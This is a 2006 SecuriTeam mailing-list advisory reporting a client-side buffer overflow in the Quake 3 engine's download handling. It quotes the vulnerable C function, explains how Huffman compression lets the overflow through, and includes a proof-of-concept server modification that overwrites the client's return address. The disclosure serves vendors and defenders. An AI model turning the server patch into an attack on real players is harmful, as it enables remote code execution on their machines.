From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 5 Jun 2006 18:08:06 +0200
Subject: [NEWS] Quake 3 Engine Client Buffer Overflow
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060606094524.2467A57FD@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Quake 3 Engine Client Buffer Overflow
------------------------------------------------------------------------
SUMMARY
The <http://www.idsoftware.com>; Quake 3 engine is the famous game engine
developed by id Software.
Improper handling of user input allows attackers to cause a buffer
overflow and execute arbitrary code in Quack 3 based engines.
DETAILS
Vulnerable Systems:
* Quake 3 version 1.32c and prior
* Icculus.org Quake 3 revision 795 and prior
The CL_ParseDownload function located in code/client/cl_parse.c is used by
the clients for handling the download commands (svc_download) received
from the server.
The function uses a signed 16 bit number sent by the server for copying
raw data from the network to the data buffer of 16384 (MAX_MSGLEN) bytes:
void CL_ParseDownload ( msg_t *msg ) {
int size;
unsigned char data[MAX_MSGLEN];
...
size = MSG_ReadShort ( msg );
if (size > 0)
MSG_ReadData( msg, data, size );
...
Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes but is
possible to bypass this limit through the Huffman compression used
automatically and trasparently in the engine (thanks to Thilo Schulz).
In short for exploiting this bug is enough to use 16384 NULL (0x00) bytes,
which occupy a very small amount of space, followed by the usual "stuff"
(return address to overwrite and shellcode).
The data copied with the MSG_ReadData is raw so there are no bad bytes to
avoid for the exploitation.
Note that the svc_download can be sent to the client in any moment so the
client can be attacked also immediately after the ending of the connect
handshake (just the first server's message).
The server must be modified for sending the malformed svc_download command
and is possible to use the following instructions which demonstrate how to
overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the "//
send the gamestate" comment at about line 575:
// send the gamestate
int i;
MSG_WriteByte( &msg, svc_download );
MSG_WriteShort( &msg, -1 ); // block != 0, for fast return
MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
for(i = 0; i < 16384; i++) { // overwrite the data buffer
MSG_WriteByte(&msg, 0x00); // 0x00 for saving space
}
for(i = 0; i < 32; i++) { // do the rest of the job
MSG_WriteByte(&msg, 'a'); // return address: 0x61616161
}
SV_SendMessageToClient( &msg, client );
return;
Vendor Status:
* Icculus will release a fix.
* ID Software did not respond.
* Other vendors were not modified.
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org.> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/q3cbof-adv.txt>;
http://aluigi.altervista.org/adv/q3cbof-adv.txt
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
